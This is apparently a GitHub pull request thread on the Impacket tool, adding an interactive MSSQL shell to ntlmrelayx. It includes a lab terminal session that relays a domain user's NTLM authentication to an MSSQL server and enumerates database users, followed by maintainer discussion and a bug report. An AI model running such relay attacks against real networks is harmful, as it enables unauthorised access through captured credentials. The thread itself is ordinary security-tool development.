
Conversation

@sploutchy
Contributor

One may need a SQLSHELL in other examples ;)

@gabrielg5 gabrielg5 self-assigned this Apr 27, 2023
@gabrielg5
Collaborator

Hi @sploutchy, thanks for your PR!

We were discussing this with the team yesterday; do you have other examples that could leverage this change?

@sploutchy
Contributor Author

Here is an example:
42247b2

┌──(hacker㉿kali)-[~]
└─$ ntlmrelayx.py -t mssql://ws1.child.testlab.local -i -smb2support --no-multirelay  
Impacket v0.10.1.dev1+20230425.94702.fadd61c8 - Copyright 2022 Fortra

[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from 10.0.1.101, attacking target mssql://ws1.child.testlab.local
[*] Authenticating against mssql://ws1.child.testlab.local as CHILD/DDRAKE SUCCEED
[!] Press help for extra shell commands
SQL (child\ddrake  guest@master)> enum_users
UserName             RoleName   LoginName   DefDBName   DefSchemaName       UserID     SID   
------------------   --------   ---------   ---------   -------------   ----------   -----   
dbo                  db_owner   sa          master      dbo             b'1         '   b'01'   
guest                public     NULL        NULL        guest           b'2         '   b'00'   
INFORMATION_SCHEMA   public     NULL        NULL        NULL            b'3         '    NULL   
sys                  public     NULL        NULL        NULL            b'4         '    NULL   
SQL (child\ddrake  guest@master)>

@gabrielg5 gabrielg5 added the in review This issue or pull request is being analyzed label May 3, 2023
@gabrielg5 gabrielg5 removed their assignment May 4, 2023
@gabrielg5 gabrielg5 added the low Low priority item label May 4, 2023
@gabrielg5 gabrielg5 self-assigned this May 4, 2023
@gabrielg5
Collaborator

Have you seen this blog post, Playing with Relayed Credentials?

There's a sample down there that allows this same feature through proxychains. Do you see any benefits of one approach over the other?

@sploutchy
Contributor Author

I read the blog post a long time ago but forgot that MSSQL was also possible through SOCKS; that's neat.
I still like having the option to perform direct attacks for some use cases (e.g. relaying one specific connection with better user-friendliness).
Cheers

@gabrielg5 gabrielg5 self-assigned this May 9, 2023
@gabrielg5 gabrielg5 merged commit 31db305 into fortra:master May 9, 2023
gabrielg5 added a commit that referenced this pull request May 9, 2023
Updated changelog to show recent merged PR #1535
@gabrielg5
Collaborator

to master. Thank you!!

@0xdeaddood 0xdeaddood removed the in review This issue or pull request is being analyzed label Jul 28, 2023
@CryingWelkin

@0xdeaddood @gabrielg5 @sploutchy After receiving an interactive SQL shell session, everything breaks. I need to use the reset command to see the output. I suggest reviewing this PR again.

[screenshot: notWorking]

@gabrielg5
Collaborator

Hi @PedantHTB,
Yes, there's something wrong there. Thanks for the heads-up!
Creating an issue to check it.
